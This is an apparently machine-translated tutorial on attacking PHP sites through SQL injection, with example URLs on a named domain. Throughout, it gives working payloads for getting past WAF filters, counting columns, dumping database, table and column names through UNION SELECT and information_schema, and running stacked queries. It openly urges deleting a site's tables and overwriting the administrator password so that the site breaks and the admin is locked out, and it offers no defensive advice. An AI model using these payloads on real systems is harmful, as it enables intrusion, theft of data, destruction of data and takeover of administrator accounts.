Some basic problems in SQL injection and their solutions

Take PHP as an example

The main reason for the failure of SQL injection is the WAF and manual Protection Code, WAF is used to intercept malicious code, but WAF is well bypassed, the rules are dead, and people are alive. WAF is deployed on the server side, filtering HTTP requests based on predefined rules, and then intercepting some common, inevitable XSS and SQL attacks.

The order BY statement is blocked?

This rarely happens, but sometimes WAF are blocked for some reason, but we can bypass it, and the method is simple, with Group by. Because no longer WAF the rules list

such as the following prompts 403 Forbidden

Http://www.8090sec.com/gallery?id=1 ORDER by 100--can try the group by

Http://www.8090sec.com/gallery?id=1 GROUP BY 100--succeeded

However, it is possible that this will also be intercepted. So we use a statement that is not so widely circulated. That's

(main query statement) = (select 1)

Http://www.8090sec.com/news.php?id=8 and (SELECT * from admins) = (select 1)

An error may be returned, similar to Operand should contain 5 column (s).

So we know there are 5 columns.

Then the union select will understand.

Http://www.8090sec.com/news.php?id=-8 Union Select 1,2,3,4,5--order by 10000 still no error?

Here is a little bit about sometimes order by can be used, but to 10000 or no error, and the previous section is different, on

A section is a request to be intercepted by WAF, here, because the injection statement is a little different, when I first met,

I naively thought that there were really 10000 columns in the database list. The answer is simple, order by 1000000 or no error, is

Because our injection statements are not running.

Http://www.8090sec.com/news.php?id=9 ORDER by 10000000000--no error

Let's change the URL a little bit, add a single quote behind the ID, and add a plus sign at the end.

Http://www.8090sec.com/news.php?id=9 ' ORDER by 10000000--+ error

Then you start using the union query, and the same method.

Http://www.8090sec.com/news.php?id=-9 ' Union Select 1,2,3,4,5,6,7,8--+

Get data from other databases

Sometimes we inject success, but read out of the table are some news Ah, album Ah, article Ah, and so on, we want to

Look for the management, login list AH. That's when we need to see if there are any other databases.

Get all the database names first:

Http://www.8090sec.com/news.php?id=9 Union Select 1,2,group_concat (schema_name), 4 from Information_schema.schemata

Then get the table for the specified database:

Http://www.8090sec.com/news.php?id=9 Union SELECT 1,2,GROUP_CONCAT (TABLE_NAME), 4 from Information_schema.tables where table_schema= (fill in the Database hex encoding)

And then get all the columns:

Http://www.8090sec.com/news.php?id=9 Union Select 1,2,group_concat (column_name), 4 from Information_schema.tables

where table_schema= (fill in the Database hex encoding) and table_name= (the hex encoding of the table name is filled in here)

Can I modify the information in the database through SQL injection?

SQL can query, update, insert information, so, query information is only one of the functions, sometimes can not be cracked

The MD5 value of the administrator account. So why not add one yourself? Insert the statement, if you cannot find the

Backstage, the evil point, simply drop off the entire table, so that the administrator also landing not on the. The website is also broken. Also

You can modify the administrator password by updating the UPDATE statement.

Http://www.8090sec.com/news.php?id=1

Suppose there is an injection here.

We got some table names through union, like we have news, so we delete news through the following statement

Table.

http://www.8090sec.com/news.php?id=1; DROP TABLE News

Then all the news content on the site is gone, if you want to change the administrator password, then this:

http://www.8090sec.com/news.php?id=1; UPDATE ' admin_login ' SET ' password ' = ' your own MD5 ' WHERE login_name= ' admin '--